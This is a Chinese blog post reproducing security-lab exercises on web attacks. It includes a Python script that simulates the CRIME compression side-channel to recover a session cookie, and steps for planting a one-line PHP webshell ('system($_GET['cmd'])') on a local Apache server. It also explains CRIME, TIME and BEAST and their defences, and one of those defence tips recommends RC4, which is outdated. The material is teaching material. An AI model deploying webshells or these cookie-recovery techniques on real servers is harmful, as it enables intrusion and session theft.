web攻击

你若盛开,清风自来!2024-05-06 10:46
python 复制代码 
#!/usr/bin/python3
import string
import zlib
import sys
import random
  
charset = string.letters + string.digits
  
COOKIE = ''.join(random.choice(charset) for x in range(30))
  
HEADERS = ("POST / HTTP/1.1\r\n"
           "Host: thebankserver.com\r\n"
           "Connection: keep-alive\r\n"
           "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
           "Accept: */*\r\n"
           "Referer: https://thebankserver.com/\r\n"
           "Cookie: secret="+COOKIE+"\r\n"
           "Accept-Encoding: gzip,deflate,sdch\r\n"
           "Accept-Language: en-US,en;q=0.8\r\n"
           "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"
           "\r\n")
BODY =    ("POST / HTTP/1.1\r\n"
           "Host: thebankserver.com\r\n"
           "Connection: keep-alive\r\n"
           "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
           "Accept: */*\r\n"
           "Referer: https://thebankserver.com/\r\n"
           "Cookie: secret=")
cookie = ""
  
def compress(data):
  
    c = zlib.compressobj()
    return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)
def getposset(perchar,chars):
    posset = []
    baselen = len(compress(HEADERS+perchar))
    for i in chars:
        t = len(compress(HEADERS+ perchar+i))
        if (t<=baselen):
            posset += i
    return posset
def doguess():
    global cookie
    while len(cookie)<30:
        posset = getposset(BODY+cookie,charset)
        trun = 1
        tem_posset = posset
        while 1<len(posset):
            tem_body = BODY[trun:]
            posset = getposset(tem_body+cookie,tem_posset)
            trun = trun +1
        if len(posset)==0:
            return False
        cookie += posset[0]
        print (posset[0])
        return True
  
while BODY.find("\r\n")>=0:
    if not doguess():
        print ("(-)Changebody")
        BODY = BODY[BODY.find("\r\n") + 2:]
print ("(+)orign  cookie"+COOKIE)
print ("(+)Gotten cookie"+cookie)
复制代码 
文件存在
#!/usr/bin/python3 importstring importzlib importsys importrandom charset=string.letters+string.digits COOKIE=''.join(random.choice(charset)forxinrange(30)) HEADERS=("POST/HTTP/1.1\r\n" "Host:thebankserver.com\r\n" "Connection:keep-alive\r\n" "User-Agent:Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.1(KHTML,likeGecko)Chrome/22.0.1207.1Safari/537.1\r\n" "Accept:*/*\r\n" "Referer:https://thebankserver.com/\r\n" "Cookie:secret="+COOKIE+"\r\n" "Accept-Encoding:gzip,deflate,sdch\r\n" "Accept-Language:en-US,en;q=0.8\r\n" "Accept-Charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n" "\r\n") BODY=("POST/HTTP/1.1\r\n" "Host:thebankserver.com\r\n" "Connection:keep-alive\r\n" "User-Agent:Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.1(KHTML,likeGecko)Chrome/22.0.1207.1Safari/537.1\r\n" "Accept:*/*\r\n" "Referer:https://thebankserver.com/\r\n" "Cookie:secret=") cookie="" defcompress(data): c=zlib.compressobj() returnc.compress(data)+c.flush(zlib.Z_SYNC_FLUSH) defgetposset(perchar,chars): posset=[] baselen=len(compress(HEADERS+perchar)) foriinchars: t=len(compress(HEADERS+perchar+i)) if(t<=baselen): posset+=i returnposset defdoguess(): globalcookie whilelen(cookie)<30: posset=getposset(BODY+cookie,charset) trun=1 tem_posset=posset while1<len(posset): tem_body=BODY[trun:] posset=getposset(tem_body+cookie,tem_posset) trun=trun+1 iflen(posset)==0: returnFalse cookie+=posset[0] print(posset[0]) returnTrue whileBODY.find("\r\n")>=0: ifnotdoguess(): print("(-)Changebody") BODY=BODY[BODY.find("\r\n")+2:] print("(+)origncookie"+COOKIE) print("(+)Gottencookie"+cookie)
操作正确,评测通过!
  1. #!/usr/bin/python3
  2. import string
  3. import zlib
  4. import sys
  5. import random
  7. charset = string.letters + string.digits
  9. COOKIE = ''.join(random.choice(charset) for x in range(30))
  11. HEADERS = ("POST / HTTP/1.1\r\n"
  12. "Host: thebankserver.com\r\n"
  13. "Connection: keep-alive\r\n"
  14. "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
  15. "Accept: */*\r\n"
  16. "Referer: https://thebankserver.com/\r\n"
  17. "Cookie: secret="+COOKIE+"\r\n"
  18. "Accept-Encoding: gzip,deflate,sdch\r\n"
  19. "Accept-Language: en-US,en;q=0.8\r\n"
  20. "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"
  21. "\r\n")
  22. BODY = ("POST / HTTP/1.1\r\n"
  23. "Host: thebankserver.com\r\n"
  24. "Connection: keep-alive\r\n"
  25. "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
  26. "Accept: */*\r\n"
  27. "Referer: https://thebankserver.com/\r\n"
  28. "Cookie: secret=")
  29. cookie = ""
  31. def compress(data):
  33. c = zlib.compressobj()
  34. return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)
  35. def getposset(perchar,chars):
  36. posset = []
  37. baselen = len(compress(HEADERS+perchar))
  38. for i in chars:
  39. t = len(compress(HEADERS+ perchar+i))
  40. if (t<=baselen):
  41. posset += i
  42. return posset
  43. def doguess():
  44. global cookie
  45. while len(cookie)<30:
  46. posset = getposset(BODY+cookie,charset)
  47. trun = 1
  48. tem_posset = posset
  49. while 1<len(posset):
  50. tem_body = BODY[trun:]
  51. posset = getposset(tem_body+cookie,tem_posset)
  52. trun = trun +1
  53. if len(posset)==0:
  54. return False
  55. cookie += posset[0]
  56. print (posset[0])
  57. return True
  59. while BODY.find("\r\n")>=0:
  60. if not doguess():
  61. print ("(-)Changebody")
  62. BODY = BODY[BODY.find("\r\n") + 2:]
  63. print ("(+)orign cookie"+COOKIE)
  64. print ("(+)Gotten cookie"+cookie)
复制代码

任务描述

本关任务:了解Webshell

相关知识

为了完成本关任务,你需要掌握:

1.Webshell

Webshell

本质上是放置在服务器上的脚本文件,由于其调用了操作系统的一些函数,于是拥有了与shell 类似的功能。

实验步骤

完成Webshell实验

实验步骤一,安装http服务器

更新软件源

复制代码
  1. # apt-get update

安装apache http服务

复制代码
  1. # apt-get install apache2

实验步骤二,安装php

复制代码
  1. # apt-get install php
  2. # apt-get install libapache2-mod-php
  4. # vim /etc/php/7.0/apache2/php.ini
  5. allow_url_include = On
  7. # echo "ServerName localhost:80" >> /etc/apache2/apache2.conf

实验步骤三,创建一个简单的webshell界面

复制代码
  1. # cd /root
  2. # touch test.php
  3. # echo '<?php system($_GET['cmd']);?>' >> test.php

实验步骤四,将页面复制到Web服务器当中

复制代码
  1. # cp test.php /var/www/html
  2. # service apache2 restart

实验步骤五,使用浏览器进行浏览 在网址栏输入:

复制代码
  1. http://127.0.0.1/test.php?cmd=ls

任务描述

本关任务:了解HTTPS攻击的方法

相关知识

为了完成本关任务,你需要掌握:

1.HTTPS攻击

HTTPS攻击
常见HTTPS攻击

1)CRIME攻击

攻击原理

​ 攻击者控制受害者发送大量请求,利用压缩算法的机制猜测请求中的关键信息,根据response长度判断请求是否成功。

攻击前提

​ 攻击者可以获取受害者的网络通信包。(中间人攻击,ISP供应商)

​ 浏览器和服务器支持均支持并使用压缩算法。

​ 攻击者可以控制受害者发送大量请求并可以控制请求内容。

防御方法

​ 客户端可以升级浏览器来避免这种攻击。

复制代码
  1. • Chrome: 21.0.1180.89 and above
  2. • Firefox: 15.0.1 and above
  3. • Opera: 12.01 and above
  4. • Safari: 5.1.7 and above

​ 服务器端可以通过禁用一些加密算法来防止此类攻击。

​ Apache

复制代码
  1. • SSLCompression flag = "SSLCompression off"
  2. • GnuTLSPriorities flag = "!COMP-DEFLATE"

​ 禁止过于频繁的请求。

​ 修改压缩算法流程,用户输入的数据不进行压缩。

​ 随机添加长度不定的垃圾数据。

2)TIME攻击

攻击原理

​ 攻击者控制受害者发送大量请求,利用压缩算法的机制猜测请求中的关键信息,根据response响应时间判断请求是否成功。其实TIME和CRIME一样都利用了压缩算法,只不过CRIME是通过长度信息作为辅助,而TIME是通过时间信息作为辅助。

攻击前提

​ 攻击者可以控制受害者发送大量请求并可以控制请求内容。

​ 稳定的网络环境。

防御方法

​ 在解密Response过程中加入随机的短时间延迟。

​ 阻止短时间内的频繁请求。

3)BEAST

攻击原理

​ 攻击者控制受害者发送大量请求,利用CBC加密模式猜测关键信息。

攻击前提

​ 攻击者可以获取受害者的网络通信包。(中间人攻击,ISP供应商)

​ 攻击者需要能得到发送敏感数据端的一部分权限。以便将自己的信息插入SSL/TLS会话中。

​ 攻击者需要准确的找出敏感数据的密文段。

​ 攻击这可以控制受害者发送大量请求并可以控制请求内容。

防御方法

​ 使用RC4加密模式代替BCB加密模式。

​ 部署TLS 1.1或者更高级的版本,来避免SSL 3.0/TLS 1.0带来的安全问题。

​ 在服务端设置每传输固定字节,就改变一次加密秘钥。

实验步骤

完成HTTPS攻击实验

Python利用CRIME思路验证攻击可行性

实验步骤一,进入Python交互模式:

复制代码
  1. # cd /root
  2. # python3
  3. Python 3.6.9 (default, Jul 17 2020, 12:50:27)
  4. [GCC 8.4.0] on linux
  5. Type "help", "copyright", "credits" or "license" for more information.
  6. >>>

实验步骤二,导入模块:

复制代码
  1. >>> import string
  2. >>> import zlib
  3. >>> import sys
  4. >>> import random

实验步骤三,定义字符集:

复制代码
  1. >>> charset = string.ascii_letters + string.digits

实验步骤四,定义COOKIE:

复制代码
  1. >>> COOKIE = ''.join(random.choice(charset) for x in range(30))

实验步骤五,定义头部信息:

复制代码

HEADERS = ("POST / HTTP/1.1\r\n"

"Host: thebankserver.com\r\n"

"Connection: keep-alive\r\n"

"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"

"Accept: */*\r\n"

"Referer: https://thebankserver.com/\\r\\n"

"Cookie: secret="+COOKIE+"\r\n"

"Accept-Encoding: gzip,deflate,sdch\r\n"

"Accept-Language: en-US,en;q=0.8\r\n"

"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"

"\r\n")

实验步骤六,定义BODY:

复制代码

实验步骤七,定义cookie:

BODY = ("POST / HTTP/1.1\r\n"

"Host: thebankserver.com\r\n"

"Connection: keep-alive\r\n"

"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"

"Accept: */*\r\n"

"Referer: https://thebankserver.com/\\r\\n"

"Cookie: secret=")

  1. >>> cookie = ""

实验步骤八,定义猜测方法:

复制代码
  1. >>> def compress(data):
  2. ...
  3. ... c = zlib.compressobj()
  4. ... return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)
  6. >>> def getposset(perchar,chars):
  7. ... posset = []
  8. ... baselen = len(compress(HEADERS+perchar))
  9. ... for i in chars:
  10. ... t = len(compress(HEADERS+ perchar+i))
  11. ... if (t<=baselen):
  12. ... posset += i
  13. ... return posset
  15. >>> def doguess():
  16. ... global cookie
  17. ... while len(cookie)<30:
  18. ... posset = getposset(BODY+cookie,charset)
  19. ... trun = 1
  20. ... tem_posset = posset
  21. ... while 1<len(posset):
  22. ... tem_body = BODY[trun:]
  23. ... posset = getposset(tem_body+cookie,tem_posset)
  24. ... trun = trun +1
  25. ... if len(posset)==0:
  26. ... return False
  27. ... cookie += posset[0]
  28. ... print(posset[0])
  29. ... return True

实验步骤九,猜测循环体:

复制代码
  1. >>> while BODY.find("\r\n")>=0:
  2. ... if not doguess():
  3. ... print ("(-)Changebody")
  4. ... BODY = BODY[BODY.find("\r\n") + 2:]

实验步骤十,编写输入代码:

复制代码
  1. >>> print("(+)orign cookie"+COOKIE)
  2. >>> print("(+)Gotten cookie"+cookie)

实验步骤十一,将上述步骤编写为执行文件:

输入命令:

# vi /root/CRIME.py

输入内容:

复制代码
  1. #!/usr/bin/python3
  2. import string
  3. import zlib
  4. import sys
  5. import random
  7. charset = string.letters + string.digits
  9. COOKIE = ''.join(random.choice(charset) for x in range(30))
  11. HEADERS = ("POST / HTTP/1.1\r\n"
  12. "Host: thebankserver.com\r\n"
  13. "Connection: keep-alive\r\n"
  14. "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
  15. "Accept: */*\r\n"
  16. "Referer: https://thebankserver.com/\r\n"
  17. "Cookie: secret="+COOKIE+"\r\n"
  18. "Accept-Encoding: gzip,deflate,sdch\r\n"
  19. "Accept-Language: en-US,en;q=0.8\r\n"
  20. "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"
  21. "\r\n")
  22. BODY = ("POST / HTTP/1.1\r\n"
  23. "Host: thebankserver.com\r\n"
  24. "Connection: keep-alive\r\n"
  25. "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
  26. "Accept: */*\r\n"
  27. "Referer: https://thebankserver.com/\r\n"
  28. "Cookie: secret=")
  29. cookie = ""
  31. def compress(data):
  33. c = zlib.compressobj()
  34. return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)
  35. def getposset(perchar,chars):
  36. posset = []
  37. baselen = len(compress(HEADERS+perchar))
  38. for i in chars:
  39. t = len(compress(HEADERS+ perchar+i))
  40. if (t<=baselen):
  41. posset += i
  42. return posset
  43. def doguess():
  44. global cookie
  45. while len(cookie)<30:
  46. posset = getposset(BODY+cookie,charset)
  47. trun = 1
  48. tem_posset = posset
  49. while 1<len(posset):
  50. tem_body = BODY[trun:]
  51. posset = getposset(tem_body+cookie,tem_posset)
  52. trun = trun +1
  53. if len(posset)==0:
  54. return False
  55. cookie += posset[0]
  56. print (posset[0])
  57. return True
  59. while BODY.find("\r\n")>=0:
  60. if not doguess():
  61. print ("(-)Changebody")
  62. BODY = BODY[BODY.find("\r\n") + 2:]
  63. print ("(+)orign cookie"+COOKIE)
  64. print ("(+)Gotten cookie"+cookie)
复制代码
  1. # python CRIME.py
  2. B
  3. r
  4. Z
  5. c
  6. M
  7. 2
  8. l
  9. 4
  10. s
  11. 7
  12. (-)Changebody
  13. w
  14. F
  15. 9
  16. K
  17. 6
  18. 8
  19. E
  20. w
  21. E
  22. P
  23. t
  24. W
  25. a
  26. U
  27. (-)Changebody
  28. i
  29. E
  30. N
  31. 9
  32. r
  33. 1
  34. (-)Changebody
  35. (-)Changebody
  36. (-)Changebody
  37. (-)Changebody
  38. (+)orign cookieBrZcM2l4s7wF9K68EwEPtWaUiEN9r1
  39. (+)Gotten cookieBrZcM2l4s7wF9K68EwEPtWaUiEN9r1

将结果保存到文件中:

复制代码
  1. # python CRIME.py > /root/HTTPS.txt

任务:

完成实验。

开始你的任务吧,祝你成功!

相关推荐
coder_pig3 小时前
🤡 公司Android老项目升级踩坑小记
android·flutter·gradle
死就死在补习班4 小时前
Android系统源码分析Input - InputReader读取事件
android
死就死在补习班4 小时前
Android系统源码分析Input - InputChannel通信
android
死就死在补习班4 小时前
Android系统源码分析Input - 设备添加流程
android
死就死在补习班4 小时前
Android系统源码分析Input - 启动流程
android
tom4i5 小时前
Launcher3 to Launchpad 01 布局修改
android
雨白5 小时前
OkHttpClient 核心配置详解
android·okhttp
淡淡的香烟5 小时前
Android auncher3实现简单的负一屏功能
android
RabbitYao5 小时前
Android 项目 通过 AndroidStringsTool 更新多语言词条
android·python
RabbitYao6 小时前
使用 Gemini 及 Python 更新 Android 多语言 Excel 文件
android·python
热门推荐
01UV安装并设置国内源02KGG转MP3工具|非KGM文件|解密音频03Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code04DeepSeek更新!速览DeepSeek V3.1新特性05蜘蛛磁力 搜索引擎大全,如何使用蜘蛛磁力查找磁力链接06Claude Code VSCode集成开发指南:AI编程助手完整配置07【2025.08.06最新版】Android Studio下载、安装及配置记录(自动下载sdk)082025最新国内服务器可用docker源仓库地址大全(2025年8月更新)09Spring 调试终于不再痛苦了10NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南